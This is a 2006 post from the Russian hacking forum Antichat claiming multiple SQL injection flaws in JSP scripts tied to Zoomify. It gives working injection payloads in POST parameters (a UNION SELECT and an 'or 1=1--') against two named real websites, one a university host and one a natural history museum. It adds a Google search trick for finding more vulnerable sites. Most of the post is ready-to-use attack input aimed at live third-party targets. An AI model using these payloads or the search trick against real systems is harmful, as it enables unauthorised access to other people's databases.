Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Многочисленные уязвимости Zoomify (https://forum.antichat.xyz/showthread.php?t=27326)

1ten0.0net1 16.11.2006 02:56
Многочисленные уязвимости Zoomify
 
Zoomify представляет собой достаточно распространенный набор JavaScript - скриптов.
Уязвимы несколько переменных (отсутсвие филтрации), например:
$VolumeId, $pageId скрипта eachpage.jsp
Пример:
_http://tomcat.sunsite.ualberta.ca/Imanishi/eachpage.jsp
POST: pageid=KAMA0008&VolumeId=KAMA'+union%20select%201, 2--&catNumber=13

$imagecode в скрипте image-detail.jsp
Пример:
_http://www.nhm.ac.uk/research-curation/projects/solanaceaesource/taxonomy/image-detail.jsp
POST:imagecode=931+or+1=1--

Google trick:
powered Zoomify [filetype:jsp]


Время: 23:23